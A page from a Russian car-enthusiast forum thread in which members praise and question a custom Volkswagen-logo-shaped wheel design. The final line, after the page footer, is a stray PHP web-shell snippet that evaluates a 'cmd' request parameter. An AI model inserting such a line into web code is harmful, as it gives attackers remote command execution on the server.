+ Ответить в теме
Страница 2 из 10 ПерваяПервая 1 2 3 4 ... ПоследняяПоследняя
Показано с 11 по 20 из 99

Тема: Новогодний подарок ФАНАТАМ марки VW. Нормальным водителям смотреть не рекомендуется!!


  1. #11
    GTI-Racing torero is on a distinguished road Аватар для torero
    Регистрация
    23.11.2011
    Откуда
    москва
    Машина
    R20
    Сообщений
    55
    Идея супер но мне кажется возникнет проблема уже когда они будут стоят на реальном авто .. На рисунке всё красиво но в жизни при остановке авто на переднем колесе логотип может быть перевёрнутым а на заднем в этот момент боком -как это будет выглядеть ?
    Хотя я в этом абсолютный дилетант ...
    жизнь как миг. опять звучит трубы призывный зов

  2. #12
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    u
    Цитата Сообщение от torero Посмотреть сообщение
    Идея супер но мне кажется возникнет проблема уже когда они будут стоят на реальном авто .. На рисунке всё красиво но в жизни при остановке авто на переднем колесе логотип может быть перевёрнутым а на заднем в этот момент боком -как это будет выглядеть ?
    Хотя я в этом абсолютный дилетант ...
    Все правильно написал, но меня достаточно перевернуть к верху ногами и я все равно узнаю что за модель вагена .)) Можем проверить при встрече или на Фесте ))) для ценителей это не проблема.......красивую женщину как не положи так всяк прекрасна и манительна))))
    песок сыпется....не останавливайтесь на достигнутом !

  3. #13
    GTI-Racing torero is on a distinguished road Аватар для torero
    Регистрация
    23.11.2011
    Откуда
    москва
    Машина
    R20
    Сообщений
    55
    Да но что бы сделать ну например красивый снимок -придётся побегать с домкратом ??
    жизнь как миг. опять звучит трубы призывный зов

  4. #14
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Цитата Сообщение от torero Посмотреть сообщение
    Идея супер ...
    Большое спасибо за положительную оценку! :-)

    Цитата Сообщение от torero Посмотреть сообщение
    ... но мне кажется возникнет проблема уже когда они будут стоят на реальном авто .. На рисунке всё красиво но в жизни при остановке авто на переднем колесе логотип может быть перевёрнутым а на заднем в этот момент боком -как это будет выглядеть ?
    Хотя я в этом абсолютный дилетант ...
    Вы совершенно правы! На рисунках я умышлено изобразил колеса в самом выигрышном положении [аналогичным образом нужно будет поочередно поддомкратить и провернуть колеса на VW-фестивале, Автоэкзотике, Worthersee и т.п.], а в реальной жизни будет примерно как Вы описали. Но выглядеть это будет вполне естественно, так как все понимают что это колеса и они вращаются. Сейчас практически у любого автомобиля на ступицах колес и ступице рулевого колеса присутствуют логотипы автопроизводителя и они вращаются и останавливаются далеко не всегда в вертикальном положении и никто не считает это недостатком. Прежде чем взяться за реализацию этого проекта, я проводил опрос нескольких людей, на основании результатов которого могу утверждать что когда человек на стоянке увидит автомобиль на данных колесах, он врятли подумает: "Почему логотип VW наклонен [перевернут] ???!!! Непорядок(((" , а скорее приятно удивится: "Вау!!! Огромные колеса в форме логотипа VW!!!!! Вот это круто!!!!!"

    Чтобы окончательно развеять все сомнения предлагаю Вам посмотреть на фотографии популярных литых колес Ronal Teddy Bear:







































    Последний раз редактировалось crazy_engineer; 04.01.2012 в 00:10.

  5. #15
    GTI-Racing Serzh will become famous soon enough Serzh will become famous soon enough Аватар для Serzh
    Регистрация
    21.01.2008
    Откуда
    Киев
    Машина
    A4 Allroad
    Сообщений
    1,211
    Вадим,

    Затея с изюминкой.
    какой примерно будет вес??
    MKV GTI APR Stage 2 - продан ((
    AUDI A4 allroad
    МB E280 4 MATIC - продан

  6. #16
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Цитата Сообщение от Serzh Посмотреть сообщение
    Вадим,

    Затея с изюминкой.
    какой примерно будет вес??
    Спасибо!

    Масса данного колеса принесена в жертву дизайну, поэтому хотя оно и кованое, но весить будет немногим меньше штатного литого колеса.

  7. #17
    SMokED
    Guest Аватар для SMokED
    ВЕЛИКОЛЕПНО!!!!

  8. #18
    Купралётчик dimm is just really nice dimm is just really nice dimm is just really nice dimm is just really nice dimm is just really nice Аватар для dimm
    Регистрация
    19.03.2010
    Откуда
    Москва, Сочи
    Машина
    SEAT Leon Cupra Tribu - сток by OverLoad
    Сообщений
    1,939
    Вадим, я тебе ЛЕОН ФР не продам ;)
    Идея - СУПЕР! Мечты должны сбываться - на то они и мечты! :)

  9. #19
    Banned V0ditel is on a distinguished road Аватар для V0ditel
    Регистрация
    08.09.2011
    Откуда
    Москва
    Машина
    Бричка
    Сообщений
    6
    ух ептыть, красотень то какая!

  10. #20
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Цитата Сообщение от V0ditel Посмотреть сообщение
    ух ептыть, красотень то какая!
    Это Вы про медведей? ;-)



    Любопытно что сам Volkswagen устанавливал подобные колеса [только конструктивно проще и диаметром всего 13 дюймов] на Polo. Причем не на овощные, а на заряженные Polo G40 CUP ! ! ! ! !
























+ Ответить в теме
Страница 2 из 10 ПерваяПервая 1 2 3 4 ... ПоследняяПоследняя

Похожие темы

  1. Ответов: 6
    Последнее сообщение: 02.04.2024, 02:45
  2. Зимняя резина по нормальным ценам
    от kolmar в разделе Шины, диски
    Ответов: 19
    Последнее сообщение: 01.04.2024, 11:50
  3. Ответов: 5
    Последнее сообщение: 08.01.2014, 13:03
  4. Ответов: 2
    Последнее сообщение: 07.01.2010, 22:23
  5. Ответов: 5
    Последнее сообщение: 16.09.2009, 19:23

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}